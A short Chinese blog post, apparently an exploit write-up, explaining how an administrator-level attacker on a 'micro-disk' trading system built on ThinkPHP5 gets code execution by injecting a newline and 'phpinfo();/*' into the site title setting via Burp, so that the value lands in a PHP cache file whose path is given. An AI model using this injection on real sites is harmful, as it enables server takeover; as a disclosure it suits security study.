【微盘系统】后台修改配置文件通过缓存进行Getshell

先阅读文章:Thinkphp5.X缓存文件命名规则解析  或许才能看得懂下面内容。

修改网站标题:

Image description

通过Burp进行中间修改

Image description

phpinfo();/*
Image description

有换行,这个换行比较重要。没有他就GG。

然后去访问刷新前台。

Image description

看到标题改变后访问:

Image description

Getshell成功!

案例2

参数设置->配置管理->web_name->修改

Image description

Payload:

web_name"
phpinfo();/*

最终访问:

/runtime/cache/29/1918da8988fc177007497b63de9cc8.php

Image description
© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容